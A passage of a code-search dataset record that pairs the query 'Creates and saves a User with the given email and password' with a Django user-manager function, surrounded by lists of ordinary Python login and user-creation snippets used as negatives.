LOG.debug(\"Sending: %s\", login_data)\n response = self._request(self._session.post, url, data=login_data)\n LOG.debug(\"Received: %s\", response.json())\n\n if response.status_code != 200:\n raise RuntimeError(\"Cannot login. Server reported: %s\"\n % response.content)", "def login(self):\n self.open(self.urls['login'])\n self.select_form(nr=0)\n\n self.form['custno'] = self.username\n self.form['password'] = self.password\n res = self.submit()\n \n return res", "def login(self):\r\n\r\n # Open browser with the login URL\r\n self.browser.open(self.config[\"base_url\"] + \"login\")\r\n\r\n # Select the login form\r\n self.browser.select_form('form[action=\"/login/\"]')\r\n\r\n # Fill the login form.\r\n self.browser[\"email\"] = self.config[\"email\"]\r\n self.browser[\"password\"] = self.config[\"password\"]\r\n\r\n # Submit form\r\n self.browser.submit_selected()", "def do_login(self, password):\n # Creating JSON string with authentication credentails.\n in_data = ('{{ \"username\":\"{username}\",'\n '\"password\":\"{password}\" }}'\n ).format(\n username=self.pub_user,\n password=password\n )\n\n url = self.base_url + \"/oasis/login\"\n response = self.do_request(url, in_data)\n json_response = json.loads(response.content)\n\n if json_response[\"success\"] == False:\n print(\"Invalid user id or password\")\n else:\n self.cookies = dict(sessionid=response.cookies['sessionid'])\n print(\"You are logged into Mid-tier\")\n\n logger.info( 'Log in response ' + str(response.content))", "def login(self):\n logging.debug(\"login called\")\n\n # Apply settings\n self.localisationsettings.apply_to_upcoming_session()\n self.admin_setting.apply_to_upcoming_session()\n self.macspoof_setting.apply_to_upcoming_session()\n self.network_setting.apply_to_upcoming_session()\n\n self.mainwindow.hide()\n self.gdmclient.do_login()", "def login(self, **kwargs):\n\tusername = kwargs.get('username', self.username)\n\tif not username:\n\t raise RuntimeError, 'no username provided'\n\n\tpassword = kwargs.get('password', self.password)\n\tif not password:\n\t raise RuntimeError, 'no password provided'\n\tself.call('login', username=username, password=password)", "def login(self):\n\t\twhile True:\n\t\t\tos.system('clear')\n\t\t\tprint(\"1. Sign in\")\n\t\t\tprint(\"2. Sign up\")\n\t\t\tchoice = input()\n\t\t\tif choice == \"1\":\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tself._sign_up()\n\n\t\twhile self._input():\n\t\t\tos.system(\"clear\")\n\t\t\tprint(\"Wrong username or password! Please re-enter.\")", "def logUserIn(self):\n self.browser.get(self.live_server_url)\n self.browser.get(self.live_server_url + reverse('registration:auth_login').rstrip())\n self.assertIn(\n 'login',\n self.browser.current_url\n )\n self.browser.find_element_by_name('username').send_keys(TEST_USER['username'])\n self.browser.find_element_by_id('id_password').send_keys(TEST_USER['password'])\n self.browser.find_element_by_id('submit-login').click()", "def login(self):\n \n self.br.open(\"http://kanji.koohii.com/login\")\n self.br.form = list(self.br.forms())[0]\n self.br[\"username\"] = USER\n self.br[\"password\"] = PASSWORD\n my_response = self.br.submit()\n print \"Login successful\"", "def login(self):\n\t\tbot = self.bot\n\t\tbot.get(URL)\n\t\ttime.sleep(2)\n\t\tsign_in = bot.find_element_by_class_name(\"nav__button-secondary\").click()\n\t\ttime.sleep(2)\n\t\temail = bot.find_element_by_id(\"username\")\n\t\temail.send_keys(self.username)\n\t\ttime.sleep(2)\n\t\tpassword = bot.find_element_by_id(\"password\")\n\t\tpassword.send_keys(self.password)\n\t\ttime.sleep(2)\n\t\tsign_in = bot.find_element_by_class_name(\"btn__primary--large.from__button--floating\").click()", "def logIn(self, username='admin', password='password'):\n # Open webbrowser, go to admin page\n self.browser.get(self.live_server_url + '/accounts/login/')\n\n # Enter username in log-in form\n username_field = self.browser.find_element_by_name('username')\n username_field.send_keys(username)\n\n # Enter password\n password_field = self.browser.find_element_by_name('password')\n password_field.send_keys('password')\n\n # Submit\n password_field.send_keys(Keys.RETURN)", "def login(email, password):\n rino.login.login(email, password)", "def login(email, password):\n rino.login.login(email, password)", "def login(self):\n self.driver.get(self.login)\n PAUSE = 2\n time.sleep(PAUSE)\n user_input = self.driver.find_element_by_name('username')\n pass_input = self.driver.find_element_by_name('password')\n login_button = self.driver.find_elements_by_xpath(\"//div[contains(text(),'Log In')]\")[0]\n user_input.send_keys(self.username)\n pass_input.send_keys(self.password)\n login_button.click()\n time.sleep(PAUSE)", "def login(self):\n self._session = requests.Session()\n data = {'login': self.username, 'password': self.password}\n url = self.address + '/login_generic'\n r = self._session.post(url, data=data)\n if 'field-login' in r.text:\n # Response still contains login form\n raise RuntimeError('Login failed.')", "def login(self):\n #raise NotImplementedError(\"This method must be overridden\")", "def login(self, username, password):\n return self.app.post('/login', data = dict(\n username = username,\n password = password\n ), follow_redirects = True)", "def login(self):\n driver = self.selenium_test.driver\n driver.get(self.selenium_test.get_server_url())\n self.selenium_test.wait_fn(self.preenche_username)\n driver.find_element_by_id('btnlogin').click()\n self.selenium_test.wait_to_be_logged_in()", "def login(self):\n login_form = {\"kid\": \"\",\n \"uni\": self.server,\n \"login\": self.username,\n \"pass\": self.password}\n url = \"https://%s.ogame.gameforge.com/main/login\" % self.country_code\n result = self.session.post(url, data=login_form)", "def do_login(self, login):\n if not login:\n print('please supply a user name to login')\n return\n self._user = re.sub(r'\\W', '_', str(login).strip().lower())\n print('Logged in as:', self._user)", "def login(self):\n if self._cookie_cached(self.login_email):\n self.cookie_login(self.login_email)\n else:\n self.new_login(self.login_email, self.login_pass)", "def login_user():\n pass", "def do_login(self):\n self.content = self._login()\n if self.with_tags:\n self.rest_content = self._login_vapi()", "def login(self):\r\n \r\n # Get the csrf token from the main URL\r\n csrf = self.extract_csrf(API.url_login)\r\n \r\n # Construnct the payload\r\n payload = self.cfg['payload']['login'][0]\r\n payload['csrfmiddlewaretoken'] = csrf\r\n\r\n # Test the entry with it's json schema\r\n check.check_entry(path='schemas/login.json', test=payload)\r\n\r\n # Login request \r\n requests.post(API.url_login, payload, headers={'Referer' : API.url_login})", "def login(self):\n # Enter login credentials\n WebDriverWait(self.driver, 120).until(\n EC.element_to_be_clickable(\n (By.ID, \"session_key-login\")\n )\n )\n elem = self.driver.find_element_by_id(\"session_key-login\")\n elem.send_keys(self.username)\n elem = self.driver.find_element_by_id(\"session_password-login\")\n elem.send_keys(self.password)\n # Enter credentials with Keys.RETURN\n elem.send_keys(Keys.RETURN)\n # Wait a few seconds for the page to load\n time.sleep(3)", "def do_login(self, backend, user):", "def login_bot(self):\n pass", "def authenticate(self):\n self.login(closet.app.config['USERNAME'],\n closet.app.config['PASSWORD'])", "def login(self, email, password):\r\n self.provide_info(email, password)\r\n self.submit()", "def do_login(cs, args):\n resp = cs.users.login(args.username, args.password, cs.baseurl)\n if resp.status_code == 200:\n print(\"Successfully login, session id: %s\" %\n resp.cookies.get('beegosessionID'))\n else:\n print(\"Failed to login! Please re-check your username and password\")", "def login(self):\n return self.client.login(username='Georgie', password='12345678')", "def login(args, syn):\n syn.login(args.synapseUser, args.synapsePassword, rememberMe=args.rememberMe)", "def login(self, configuration=False):\n if configuration:\n username = self.configuration_username\n password = self.configuration_password\n else:\n username = self.username\n password = self.password\n\n while callable(password):\n password = password()\n log.info(\"Logging into the netscaler at %s\", self.host)\n res = self.post(\"/login\", {\"login\": {\"username\": username, \"password\": password}})\n self.sessionid = res[\"sessionid\"]", "async def login(self, *args, **kwargs) -> None:\n logger.info(\"Logging in to Discord...\")\n\n self.http_session = ClientSession()\n\n await super().login(*args, **kwargs)", "def login(self, username, password):\n return self.app.post('/login', data=dict(\n username=username,\n password=password\n ), follow_redirects=True)", "def login(self):\n if not self.__initialized:\n raise NSNitroError(\"Not initialized.\")\n\n payload = {\"object\":json.dumps({\"login\":{\"username\":self.__user,\"password\":self.__password}})}\n try:\n nsresponse = self.post(payload)\n if nsresponse.failed:\n raise NSNitroError(nsresponse.message)\n\n self.__sessionid = nsresponse.get_response_field('sessionid')\n self.__postheaders = {'Cookie' : 'sessionid='+self.__sessionid, 'Content-type' : self.__contenttype}\n self.__loggedin = True\n return True\n\n except SyntaxError:\n raise NSNitroError(\"Could not parse LB response.\")\n except urllib2.URLError, ue:\n raise NSNitroError(\"Error logging in!\" + ue.message)", "def login(self, username, password):\n\t\turl = \"https://habitica.com/api/v3/user/auth/local/login\"\n\t\tpayload = {\"username\": username, \"password\": password}\n\t\treturn(postUrl(url, self.credentials, payload))", "def login(self):\n with self.client.post(\"/login\", {\"username\":self.user.username,\n \"password\":MASTER_PASSWORD},\n catch_response=True) as response:\n for r_hist in response.history:\n if r_hist.cookies.get('token') is not None:\n response.success()\n return\n response.failure(\"login failed\")", "def __login(self, args = []):\n\n try:\n \n # Send username and wait for an ACK\n self.__cm.send(p.T_USER, [self.__username])\n reply = self.__cm.receive()\n \n if (reply.type != p.T_ACK):\n raise Exception, \"Unable to login!\"\n\n # Send password and wait for an ACK\n self.__cm.send(p.T_PASS, [self.__password])\n reply = self.__cm.receive()\n \n if (reply.type != p.T_ACK):\n raise Exception, \"Invalid credentials!\"\n\n except Exception,e:\n self.__handleError('Authenticate', e)", "def log_in(self, ctx: Context):\n email = json.loads(ctx.users)['username']\n password = json.loads(ctx.users)['password']\n InputFunctions.send_keys_to_element_by_name(\n self.ctx, self.locators, \"email_input\", email\n )\n InputFunctions.send_keys_to_element_by_name(\n self.ctx, self.locators, \"password_input\", password\n )\n ClickFunctions.click_element_by_name(ctx, self.locators, \"login_button\")\n ClickFunctions.click_element_by_name(ctx, self.locators, \"back_to_content\")", "def do_login(self):\n if self.app.authentication_only:\n self.app.stop()\n else:\n self.set_screen(EXPLORER)", "def login(self, username, password):\n raise NotImplementedError\n # data = self.prepare_data_for_requests_post(username, password)\n #\n # # post request using session created at instantiation\n # r = self.session.post(self.start_url, data=data)\n #\n # return r.ok", "def login(self, username, password):\n return self.post('/login', data={\n 'username': username,\n 'password': password\n }, follow_redirects=True)", "def loginAsManager(self):\n self.browser.open('http://nohost/plone/')\n self.browser.getLink('Log in').click()\n self.browser.getControl('Login Name').value = 'root'\n self.browser.getControl('Password').value = 'secret'\n self.browser.getControl('Log in').click()", "def login(**kwargs):\n root_commands.cmd_login(**kwargs)", "def _login(self):\n body = {\n 'name': self.username,\n 'password': self.password\n }\n\n # Unset token now, otherwise potential expired token will be sent\n # along to be used for authorization when trying to login.\n\n try:\n LOG.debug('Getting Datera auth token.')\n results = self._issue_api_request('login', 'put', body=body,\n sensitive=True)\n self.datera_api_token = results['key']\n except exception.NotAuthorized:\n with excutils.save_and_reraise_exception():\n LOG.error(_LE('Logging into the Datera cluster failed. Please '\n 'check your username and password set in the '\n 'cinder.conf and start the cinder-volume '\n 'service again.'))", "def login(self):\n login = self.client.login(username=self.username, password=self.password)\n return login", "def login(self):\n login = self.client.login(username=self.username, password=self.password)\n return login", "def login():\n login_page = Login()\n login_page.login_main_page()", "def main_login(\n client: CitusCloudMgmt,\n **opts: tp.Any\n) -> None:\n client.login()\n logger.info(\"successfully logged in\")", "def do_login(user, password):\n return um.do_login(user, password)", "def login(self, login):\n\n self._login = login", "def registrieren(self):\n self.c.login(self.username.text(), self.password.text(), \"0\")", "def login_user(self, username, pwd):\n self.browser.get(\"%s%s\" %\n (str(self.live_server_url), '/accounts/login/'))\n username_input = self.browser.find_element_by_id('id_username')\n password_input = self.browser.find_element_by_id('id_password')\n submission_button = self.browser.find_element_by_class_name(\n 'btn-success')\n\n username_input.send_keys(username)\n password_input.send_keys(pwd)\n submission_button.click()", "def login_into_time_watch(self) -> None:\n logger.debug('Try to login to %s', self._url)\n self._driver.get(self._url)\n self._driver.find_element_by_xpath(\n '// *[@id=\"compKeyboard\"]').send_keys(self.params['user']['company'])\n self._driver.find_element_by_xpath(\n '//*[@id=\"nameKeyboard\"]').send_keys(self.params['user']['worker'])\n self._driver.find_element_by_xpath(\n '//*[@id=\"pwKeyboard\"]').send_keys(self.params['user']['pswd'])\n self._driver.find_element_by_xpath(\n '//*[@id=\"cpick\"]/table/tbody/tr[1]/td/div/div[2]/p/table/tbody/tr[4]/td[2]/input').click()\n logger.info('Logged in for worker %s', self.params['user']['worker'])", "def click_login(self):\n self.login.click()\n return self.login", "def login_action(login_page, request, driver):\n login_page.login(request.config.getoption(\"--username\"), request.config.getoption(\"--password\"))", "def login(self):\n # create auth payload\n payload = '{{\"grant_type\": \"password\", \"username\": \"{}\", \"password\": \"{}\"}}'.format(\n self.username, self.password)\n auth_headers = {**FTDClient.headers}\n r = requests.post(\"https://{}:{}/api/fdm/{}/fdm/token\".format(self.server_address, self.server_port, self.version),\n data=payload, verify=False, headers=auth_headers)\n if r.status_code == 400:\n raise Exception(\"Error logging in: {}\".format(r.content))\n try:\n # This token will act as the\n self.access_token = r.json()['access_token']\n # cache the original token in case we do a custom login\n self.original_access_token = self.access_token\n except:\n logging.error(\n f'Unable to log into server: https://{self.server_address}:{self.server_port}')\n raise", "def login(self):\n self.driver.get(f'{self.base_url}/signin')\n\n # Fill username and password\n enter_username = WebDriverWait(self.driver, 20).until(expected_conditions.presence_of_element_located((By.NAME, 'email')))\n enter_username.send_keys(self.username)\n enter_password = WebDriverWait(self.driver, 20).until(expected_conditions.presence_of_element_located((By.NAME, 'password')))\n enter_password.send_keys(self.password)\n\n # Press the Log In Button\n self.driver.find_element_by_xpath('//*[@id=\"root\"]/div/div[3]/div/div/div/div/div[2]/div/form/div/div[2]/button').click()\n\n # Wait for the page to load (5 seconds)\n sleep(5)", "def _log_into_shib( self, driver ):\n driver.find_element_by_id(\"username\").clear()\n driver.find_element_by_id(\"username\").send_keys( self.USERNAME )\n driver.find_element_by_id(\"password\").clear()\n driver.find_element_by_id(\"password\").send_keys( self.PASSWORD )\n driver.find_element_by_css_selector(\"button[type=\\\"submit\\\"]\").click()\n return driver", "def log_in(self):\n if self.is_logged_in():\n return\n\n req_html = request.urlopen(\"https://www.linkedin.com/uas/login\").read()\n soup = BeautifulSoup(req_html)\n csrf = soup.find(id=\"loginCsrfParam-login\")['value']\n\n login_data = parse.urlencode({\n 'session_key': self.username,\n 'session_password': self.password,\n 'loginCsrfParam': csrf\n })\n\n data = login_data.encode()\n\n password_manager = request.HTTPPasswordMgrWithDefaultRealm()\n password_manager.add_password(None, \"https://www.linkedin.com/\", self.username, self.password)\n\n Registration.opener.add_handler(request.HTTPBasicAuthHandler(password_manager))\n\n response = request.urlopen(\"https://www.linkedin.com/uas/login-submit\", data)\n res_html = BeautifulSoup(response.read())\n\n Registration.jar.save(Registration.cookie_filename)\n\n return response", "def login(self, address, username, password, command_logger=None):\r\n\r\n #Set object IP address, username, and password\r\n self.address = address\r\n self.username = username\r\n self.password = password", "def open(self):\n\n login_url = ('{0}://{1}/admin/launch'.format(self.proto, self.host) +\n '?script=rh&template=login&action=login')\n\n login_data = urllib.urlencode({'d_user_id': 'user_id',\n 't_user_id': 'string',\n 'c_user_id': 'string',\n 'e_user_id': 'true',\n 'f_user_id': self.user,\n 'f_password': self.password,\n 'Login': 'Login',\n })\n\n # Handle various login responses. A valid login must contain all\n # of the following searched for parameters.\n valid_responses = [['template=dashboard', \"HTTP-EQUIV='Refresh'\"],\n ['template=index', 'HTTP-EQUIV=\"Refresh\"']]\n\n try:\n resp = self._handle.open(login_url, login_data).read()\n for valid_response_list in valid_responses:\n checks = [x in resp for x in valid_response_list]\n if all(checks):\n self.log('Successfully logged in using {0}'.format(\n self.proto))\n self._closed = False\n return True\n else:\n self.log('Failed to login using {0}'.format(self.proto))\n self.log(resp, True)\n except (urllib2.HTTPError, urllib2.URLError) as e:\n self.log('{0} {1}: {2}'.format(e.__class__.__name__, self.host, e))\n\n return False", "def login(self, username: Optional[str], password: Optional[str]) -> None:\n self.username_field.fill(username)\n self.password_field.fill(password)\n\n self.submit_button.click()", "def log_in():\n if request.method == 'POST':\n username = request.form['username']\n password = request.form['password']\n if PLAN.login_user(username, password):\n session['name'] = username\n flash(\"Login success ...\")\n return redirect(url_for('index'))\n flash(\"Login failed ...\")\n return render_template('login.html')\n return render_template('login.html')", "def login(self, username, password):\n log.info(\"Inserting credentials on login page.\")\n self._driver.fill(self.UsernameFieldSelector, username)\n self._driver.fill(self.PasswordFieldSelector, password)\n self.get_continue_button().click()", "def login(self, email='khaleesi@targaryen.com', password='password'):\n return login(self.client, email, password)", "def login(self, input_user, input_pass):\n\n self.failed = False\n try:\n self.send_message('/login [' + input_user + '] [' + input_pass + ']\\r')\n\n except:\n sys.stderr.write('failed to login to server. \\n') \n Self.failed = True\n return False\n\n return True", "def Login(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def login(self, username, password):\n response = self.call('auth.login', username, password)\n if response[b'result'] == b'success':\n self.sessionid = response[b'token']\n self.authenticated = True", "def _login(self, login):\n self._tokens.clear()\n name, password = login\n\n params = {\"action\": \"query\", \"meta\": \"tokens\", \"type\": \"login\"}\n with self._api_lock:\n result = self._api_query(params, no_assert=True)\n try:\n token = result[\"query\"][\"tokens\"][\"logintoken\"]\n except KeyError:\n raise exceptions.LoginError(\"Couldn't get login token\")\n\n params = {\"action\": \"login\", \"lgname\": name, \"lgpassword\": password,\n \"lgtoken\": token}\n with self._api_lock:\n result = self._api_query(params, no_assert=True)\n\n res = result[\"login\"][\"result\"]\n if res == \"Success\":\n self._tokens.clear()\n self._save_cookiejar()\n return\n if res == \"Illegal\":\n e = \"The provided username is illegal.\"\n elif res == \"NotExists\":\n e = \"The provided username does not exist.\"\n elif res == \"EmptyPass\":\n e = \"No password was given.\"\n elif res == \"WrongPass\" or res == \"WrongPluginPass\":\n e = \"The given password is incorrect.\"\n else:\n e = \"Couldn't login; server says '{0}'.\".format(res)\n raise exceptions.LoginError(e)", "def login(self):\n url = self._root + self._routes[\"login\"]\n self.r = self.reqsession.get(url) \n if self.r.url == 'https://console.zerodha.com/dashboard':\n cookies = self.reqsession.cookies.get_dict('console.zerodha.com')\n self.console_session = cookies['session']\n self.public_token = self.reqsession.cookies['public_token']\n return True\n else:\n raise Exception(\"Login failed or Kite session expired\")", "def login(self, username, password):\n self.user = User(username=username, password=password, sess=self.session)", "def _logon(self):\n\n # if password is provided send it\n if self.password:\n rlog(10, self.name ,'sending password')\n self._raw(\"PASS %s\" % self.password)\n\n # register with irc server\n rlog(10, self.name, 'registering with %s using nick %s' % \\\n(self.server, self.nick))\n rlog(10, self.name, 'this may take a while')\n\n # check for username and realname\n username = self.nick or self.cfg['username']\n realname = self.cfg['realname'] or username\n\n # first send nick\n time.sleep(1)\n self._raw(\"NICK %s\" % self.nick)\n time.sleep(1)\n\n # send USER\n self._raw(\"USER %s localhost localhost :%s\" % (username, \\\nrealname))\n\n # wait on login\n self.connectok.wait()", "def login_user(self, username=\"foo\", pwd=\"password\"):\n return self.client.post(url_for('login'),\n data = {'username': username,\n 'password': pwd})" ]
[ "0.7973264", "0.7904653", "0.7904653", "0.7693467", "0.7655902", "0.7554838", "0.7549945", "0.7540455", "0.7519316", "0.7478677", "0.746458", "0.74409384", "0.7430161", "0.74290764", "0.7427556", "0.73943985", "0.7350303", "0.7341028", "0.73346376", "0.7320527", "0.73103094", "0.73103094", "0.73103094", "0.73103094", "0.7305757", "0.7292797", "0.72762305", "0.7216218", "0.72000116", "0.7196603", "0.7191955", "0.718072", "0.71777785", "0.71620435", "0.7161972", "0.7150208", "0.7142292", "0.711551", "0.711551", "0.7071095", "0.70627105", "0.70505255", "0.7043438", "0.70393676", "0.70370054", "0.7030825", "0.7019374", "0.70171046", "0.70135945", "0.69969195", "0.699153", "0.69840235", "0.69717216", "0.69633955", "0.6955936", "0.6924877", "0.6916802", "0.6916637", "0.6908437", "0.6903569", "0.6903325", "0.69013065", "0.6889099", "0.6874601", "0.68729365", "0.68662626", "0.6863342", "0.6863257", "0.6854222", "0.6848292", "0.6837186", "0.6835001", "0.6834047", "0.6834047", "0.68296266", "0.6826224", "0.68157446", "0.68125844", "0.6804301", "0.6790028", "0.6771608", "0.67381597", "0.6736401", "0.67338777", "0.6721514", "0.671046", "0.6688875", "0.6674819", "0.6674554", "0.6668705", "0.6659279", "0.66573346", "0.6645888", "0.66401094", "0.66348785", "0.66335905", "0.6627398", "0.66231424", "0.6622618", "0.66123855", "0.6611968" ]
0.0
-1
Creates and saves a User with the given email and password.
def _create_user(self, email, password, **extra_fields): if not email: raise ValueError('The given email must be set') email = self.normalize_email(email) user = self.model(email=email, **extra_fields) user.set_password(password) user.save(using=self._db) return user
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password=None, **extra_fields):\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n print(\"create user\")\n return user", "def create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError(_('The Email must be set'))\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save()\n return user", "def create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError(_('The Email must be set'))\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save()\n return user", "def create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError(_('The Email must be set'))\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save()\n return user", "def _create_user(self, email, password, **extra_fields):\n\n if not email:\n raise ValueError(\"Vous devez renseigner un email!\")\n\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError(_('Please provide your email address'))\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError(_('Email must be set'))\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save()\n return user", "def _create_user(self, email, password, **extra_fields):\n\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(email, password='test', **kwargs):\n user = get_user_model().objects.create(email=email, **kwargs)\n user.set_password(password)\n user.save()\n return user", "def _create_user(self, email, password, **extra_fields):\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, first_name, last_name, password, **extra_fields):\n if not email:\n raise ValueError(_('Email Address is required'))\n email = self.normalize_email(email)\n user = self.model(\n email=email,\n first_name=first_name,\n last_name=last_name,\n **extra_fields\n )\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The Email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save()\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The Email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save()\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The Email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save()\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError(\"The given email must be set\")\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def signup(cls, username, first_name, last_name, email, password):\n\n hashed_pwd = bcrypt.generate_password_hash(password).decode('UTF-8')\n\n user = User(\n username=username,\n first_name=first_name,\n last_name=last_name,\n email=email,\n password=hashed_pwd,\n )\n\n db.session.add(user)\n return user", "def create_user(self, email, password=None, **extra_fields):\n\n if not email:\n raise ValueError('El usuario debe proporcionar un email')\n\n user = self.model(email=self.normalize_email(email), **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n\n return user", "def create_user(self,email,password=None,**extra_fields):\n if not email:\n raise ValueError(\"Please provide an email\")\n user = self.model(email=self.normalize_email(email),**extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password,username, **extra_fields):\r\n if not email:\r\n raise ValueError('The given email must be set')\r\n if not username:\r\n raise ValueError('The given username must be set')\r\n email = self.normalize_email(email)\r\n user = self.model(email=email,username=str.strip(username), **extra_fields)\r\n user.set_password(password)\r\n user.save(using=self._db)", "def _create_user(self, email: str, password: str, **extra_fields) -> 'User':\n if not email:\n raise ValueError(\"The given email must be set.\")\n email = self.normalize_email(email).lower()\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save()\n return user", "def _create_user(self, email, password, **extra_fields):\n\n if not email:\n raise ValueError('The given email must be set')\n\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n\n return user", "def _create_user(self, email, password, **extra_fields):\n validate_email(email)\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email: str, password: str, **extra):\n try:\n user = self.model(email=self.normalize_email(email),\n **extra)\n user.set_password(password)\n user.save(using=self._db)\n except IntegrityError as Ex:\n raise IntegrityError(\"Duplicate\")\n return user", "def _create_user(self, email, password=None, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save()\n\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password, **extra_fields):\n if not email:\n \traise ValueError('Must provide a valid email address')\n\n now = timezone.now()\n user = self.model(\n email=self.normalize_email(email),\n date_joined=now,\n last_login=now,\n **extra_fields\n ) \n\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, username, firstname, lastname, password, **other_fields):\n\n if not email:\n raise ValueError(_('You must provide an email address'))\n\n email = self.normalize_email(email)\n user = self.model(email=email, username=username, firstname=firstname, lastname=lastname, **other_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email=None, password=None, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, username=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password, **kwargs):\n if not email:\n raise ValueError('User must have email address')\n if not password:\n raise ValueError('User must have password')\n email = self.normalize_email(email)\n user = self.model(email=email, **kwargs)\n user.set_password(password)\n user.save()\n\n return user", "def create_user(self, email, password=None, **extra_fields):\n if not email:\n raise ValueError('User must have an email address')\n\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n\n user.set_password(password) # Ensure password being encrypted\n user.save(using=self._db) # Save objects in django\n\n return user", "def create_user(self, email: str, password: str, **kwargs: str) -> \"User\":\n email = self.normalize_email(email)\n user: \"User\" = self.model(email=email, **kwargs)\n user.set_password(password)\n user.save()\n return user", "def create_user(self, email, password=None, **extra_fields):\n if not email:\n raise ValueError('Users must have an email address')\n user = self.model(email=self.normalize_email(email), **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n\n return user", "def create_user(self, email, password=None, **extra_fields):\n if not email:\n raise ValueError('Users must have an email address')\n user = self.model(email=self.normalize_email(email), **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n\n return user", "def create_user(self, email, password=None, **extra_fields):\n if not email:\n raise ValueError('Users must have an email address')\n user = self.model(email=self.normalize_email(email), **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n\n return user", "def _create_user(self, username, email, password, **extra_fields):\n if not email:\n raise ValueError('The email must be set')\n email = self.normalize_email(email)\n user = 